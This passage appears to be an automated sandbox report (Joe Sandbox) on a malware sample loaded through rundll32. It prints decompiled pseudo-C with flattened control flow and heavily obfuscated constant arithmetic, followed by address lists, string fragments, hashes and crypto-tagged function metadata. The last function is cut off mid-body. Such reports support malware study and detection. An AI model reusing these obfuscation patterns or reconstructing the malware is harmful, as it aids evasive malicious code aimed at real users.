								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00259465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00248736(_t597);
									 *0x25ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x25ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002487FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x25ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0025AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x25ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00251A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002475AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x25ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0025AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x25ca20; // 0x0
								_t592 =  *0x25ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002466C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0024F536(_v92, _v100, _v108,  *0x25ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}

0x00241d01
0x00241d0b
0x00241d0c
0x00241d0e
0x00241d13
0x00241d1e
0x00241d21
0x00241d2c
0x00241d2e
0x00241d37
0x00241d3f
0x00241d4a
0x00241d4f
0x00241d55
0x00241d5d
0x00241d65
0x00241d70
0x00241d7b
0x00241d86
0x00241d91
0x00241d9c
0x00241da7
0x00241db2
0x00241dbd
0x00241dd3
0x00241dde
0x00241de6
0x00241df1
0x00241df9
0x00241dfe
0x00241e06
0x00241e0e
0x00241e16
0x00241e1e
0x00241e26
0x00241e2e
0x00241e36
0x00241e42
0x00241e47
0x00241e52
0x00241e53
0x00241e57
0x00241e5f
0x00241e67
0x00241e6f
0x00241e77
0x00241e7f
0x00241e87
0x00241e92
0x00241ea6
0x00241ead
0x00241eb8
0x00241ec3
0x00241ecb
0x00241ed3
0x00241ede
0x00241ee9
0x00241ef1
0x00241efc
0x00241f07
0x00241f19
0x00241f23
0x00241f28
0x00241f2e
0x00241f33
0x00241f3b
0x00241f43
0x00241f4b
0x00241f4f
0x00241f54
0x00241f5c
0x00241f6e
0x00241f73
0x00241f7c
0x00241f87
0x00241f92
0x00241f9d
0x00241fa8
0x00241fb0
0x00241fbc
0x00241fc1
0x00241fc7
0x00241fcf
0x00241fd7
0x00241fe2
0x00241fed
0x00241ff8
0x00242003
0x0024200b
0x00242018
0x0024201b
0x0024201f
0x00242027
0x0024202f
0x00242037
0x0024203f
0x00242047
0x0024204c
0x00242054
0x0024205f
0x0024206a
0x00242075
0x0024208b
0x00242092
0x0024209d
0x002420a8
0x002420b0
0x002420b8
0x002420c0
0x002420c8
0x002420d0
0x002420db
0x002420e3
0x002420ee
0x00242100
0x00242103
0x0024210a
0x00242115
0x00242120
0x0024212d
0x00242138
0x00242140
0x00242145
0x0024214a
0x00242152
0x0024215a
0x0024215f
0x00242167
0x0024216f
0x0024217a
0x00242182
0x0024218d
0x00242198
0x002421a0
0x002421ab
0x002421b6
0x002421be
0x002421c6
0x002421ce
0x002421d6
0x002421de
0x002421e6
0x002421eb
0x002421f3
0x002421fb
0x00242203
0x0024220b
0x00242213
0x0024221b
0x00242223
0x0024222e
0x00242243
0x00242246
0x0024224d
0x00242258
0x00242268
0x0024226c
0x00242274
0x0024227c
0x00242284
0x0024228c
0x00242291
0x00242299
0x002422a1
0x002422a9
0x002422b2
0x002422b7
0x002422bd
0x002422c5
0x002422cd
0x002422d5
0x002422da
0x002422e7
0x002422e8
0x002422ec
0x002422f4
0x00242308
0x0024230f
0x0024231a
0x00242325
0x00242330
0x0024233b
0x00242343
0x0024234b
0x00242360
0x00242365
0x0024236b
0x00242373
0x0024237b
0x00242388
0x0024238b
0x0024238f
0x00242394
0x0024239c
0x002423a4
0x002423ac
0x002423b4
0x002423bc
0x002423c7
0x002423cf
0x002423da
0x002423ed
0x002423f4
0x002423ff
0x00242407
0x0024240f
0x00242417
0x0024241f
0x00242427
0x0024242f
0x00242437
0x0024243f
0x00242447
0x00242457
0x0024245b
0x00242467
0x0024246a
0x0024246e
0x00242476
0x00242481
0x0024248c
0x00242497
0x002424a2
0x002424ad
0x002424b8
0x002424c3
0x002424ce
0x002424d9
0x002424e1
0x002424e6
0x002424ee
0x002424f6
0x002424f6
0x002424fe
0x002424fe
0x002424fe
0x002424fe
0x00242504
0x00000000
0x00000000
0x0024250a
0x00242686
0x00242687
0x002426a7
0x002426b1
0x002426b4
0x002426b9
0x002426c0
0x002426c8
0x00000000
0x00242510
0x00242516
0x00242620
0x00242644
0x00242657
0x00242669
0x0024266f
0x00242677
0x00242679
0x0024267e
0x00000000
0x0024251c
0x00242522
0x002425f6
0x002425fa
0x002425fb
0x00242600
0x00242606
0x00242609
0x0024260f
0x00000000
0x0024260f
0x00242528
0x0024252a
0x002425cf
0x002425d5
0x002425d8
0x002425dd
0x002425e0
0x00000000
0x00242530
0x00242536
0x002425a0
0x002425a5
0x002425a6
0x002425aa
0x002425af
0x002425b2
0x00000000
0x00242538
0x0024253e
0x00000000
0x00242544
0x00242567
0x0024256d
0x0024256d
0x00242573
0x00242578
0x0024257d
0x0024282d
0x00242583
0x00242583
0x00000000
0x00242583
0x0024257d
0x0024253e
0x00242536
0x0024252a
0x00242522
0x00242516
0x00242721
0x0024272d
0x0024272d
0x002426d9
0x002427fb
0x00242802
0x00242807
0x0024280c
0x00242818
0x00000000
0x0024280e
0x0024280e
0x00000000
0x0024280e
0x002426df
0x002426e5
0x00242796
0x0024279b
0x0024279c
0x002427a0
0x002427a5
0x002427a8
0x00000000
0x002426eb
0x002426f1
0x00242744
0x0024275b
0x00242761
0x00242764
0x00242769
0x00242770
0x00242778
0x00000000
0x002426f3
0x002426f9
0x00000000
0x002426ff
0x0024271a
0x00242720
0x002426f9
0x002426f1
0x002426e5
0x00000000
0x0024281a
0x0024281a
0x00000000

Strings

HW, xrefs: 00242407
jT#, xrefs: 0024224D
[, xrefs: 002422F4
i<, xrefs: 00242223
0, xrefs: 002424B8
t<, xrefs: 0024201F
3U, xrefs: 00241EDE
@, xrefs: 00241F3B
Cta, xrefs: 0024212D
?h, xrefs: 00241F7C
T1u:, xrefs: 002420C8
uG$, xrefs: 002423A4
!C, xrefs: 0024233B
HT3=, xrefs: 0024221B
D9, xrefs: 00242373

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
API String ID: 0-3043381779
Opcode ID: 51d4de2db118ece7601c2f618531f54f0d9f6d1912400e228acbf6f5f350341a
Instruction ID: 08eccabef50296966ec76911e3d65210b9804c2e4da6a66a488b6a1cb5546fb7
Opcode Fuzzy Hash: 51d4de2db118ece7601c2f618531f54f0d9f6d1912400e228acbf6f5f350341a
Instruction Fuzzy Hash: 3F423471508381DFE378CF25C98AA9BBBE1BBC4304F50891DE5DA962A0D7B58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0025511B, Relevance: 17.9, Strings: 14, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0025511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00252674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00258C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00248736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x25c7a0);
					_push(_v208);
					E00247F4B(_t521, E0025878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00252025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0024EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0024B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0024EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0024B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x25c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002411C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0025878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00252025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}

0x0025511b
0x0025511b
0x00255125
0x0025512c
0x00255133
0x0025513b
0x00255146
0x0025514e
0x00255156
0x0025515e
0x00255163
0x0025516b
0x00255176
0x0025517e
0x00255189
0x00255191
0x00255196
0x0025519e
0x002551a6
0x002551ae
0x002551b6
0x002551be
0x002551c3
0x002551cb
0x002551d0
0x002551d8
0x002551e0
0x002551e9
0x002551f2
0x002551f7
0x002551fd
0x00255205
0x00255218
0x0025521b
0x0025521e
0x00255225
0x00255230
0x00255238
0x00255240
0x00255248
0x00255250
0x00255258
0x00255260
0x00255265
0x0025526d
0x00255275
0x00255280
0x00255288
0x00255293
0x002552a0
0x002552a4
0x002552b1
0x002552b5
0x002552bd
0x002552c8
0x002552d3
0x002552de
0x002552e6
0x002552f0
0x002552f4
0x002552fc
0x00255306
0x00255312
0x00255317
0x0025531d
0x00255322
0x0025532a
0x00255332
0x0025533a
0x0025533f
0x00255344
0x0025534c
0x00255354
0x0025535c
0x00255361
0x00255369
0x00255371
0x00255379
0x00255381
0x0025538b
0x0025538e
0x00255392
0x0025539a
0x002553a5
0x002553b0
0x002553bb
0x002553c6
0x002553ce
0x002553d9
0x002553e4
0x002553ec
0x002553f7
0x002553ff
0x00255407
0x0025540f
0x00255417
0x0025541f
0x00255427
0x0025542f
0x0025543c
0x00255440
0x00255445
0x0025544d
0x00255455
0x0025545d
0x00255465
0x0025546d
0x00255475
0x00255480
0x00255488
0x00255493
0x0025549b
0x002554a3
0x002554b0
0x002554b4
0x002554bc
0x002554c8
0x002554cd
0x002554d3
0x002554db
0x002554e3
0x002554eb
0x002554f4
0x002554f7
0x002554fb
0x00255503
0x0025550b
0x00255513
0x0025551b
0x00255525
0x00255530
0x00255538
0x00255543
0x0025554e
0x00255559
0x00255564
0x00255573
0x0025557a
0x0025557e
0x00255586
0x0025558e
0x0025559b
0x0025559f
0x002555a7
0x002555af
0x002555bc
0x002555c8
0x002555cf
0x002555d3
0x002555db
0x002555e3
0x002555eb
0x002555f3
0x002555fb
0x00255603
0x00255619
0x00255620
0x0025562b
0x0025563e
0x00255641
0x00255648
0x00255653
0x0025565e
0x00255666
0x00255671
0x00255687
0x0025568e
0x00255699
0x002556a1
0x002556ad
0x002556b0
0x002556b7
0x002556bb
0x002556c3
0x002556d6
0x002556dd
0x002556e8
0x002556f0
0x002556f8
0x00255700
0x00255708
0x00255710
0x00255722
0x00255848
0x0025584d
0x00255854
0x00255857
0x0025585c
0x00000000
0x0025585c
0x0025572e
0x00255817
0x00255821
0x00000000
0x00255821
0x0025573a
0x00255806
0x0025580d
0x002557ea
0x002557ea
0x00000000
0x002557ea
0x00255746
0x002557c7
0x002557c8
0x002557d1
0x002557d3
0x002557d8
0x002557da
0x00255998
0x00255998
0x00000000
0x00255998
0x002557e3
0x002557e8
0x002557e8
0x00000000
0x002557e8
0x00255748
0x0025574e
0x0025598c
0x0025598c
0x00255992
0x00000000
0x00000000
0x00000000
0x00255992
0x00255754
0x00255759
0x00255792
0x002557ab
0x00000000
0x002557b5
0x002558a2
0x002558a7
0x002558b0
0x002558c3
0x002558ef
0x002558f4
0x002558f9
0x002558fe
0x00255913
0x0025596b
0x0025596b
0x00255978
0x0025597d
0x00255984
0x00255987
0x00000000

Strings

=i, xrefs: 0025568E
t:, xrefs: 00255488
pv, xrefs: 002558B0
o^, xrefs: 00255465
|uQa, xrefs: 002551D0
c, xrefs: 002556DD
*T, xrefs: 002553F7
p!,, xrefs: 00255708
%, xrefs: 00255293
'v, xrefs: 00255417
OD, xrefs: 0025562B
y5, xrefs: 00255493
0), xrefs: 00255189
r{, xrefs: 00255275

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
API String ID: 0-2620103065
Opcode ID: 5c64bb7974fa844b2137f81a02432e431e97beeddde5973d1e69ae1bd01462c4
Instruction ID: 69e025ec35fe163198a56d8fd5821bed43eb979d81546dac6f514b6cdfab550c
Opcode Fuzzy Hash: 5c64bb7974fa844b2137f81a02432e431e97beeddde5973d1e69ae1bd01462c4
Instruction Fuzzy Hash: 53223371508380DFE364CF25C48AA8BFBE2BBC4748F108A1DE5D9962A1D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00244A35, Relevance: 16.7, Strings: 13, Instructions: 468
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00244A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
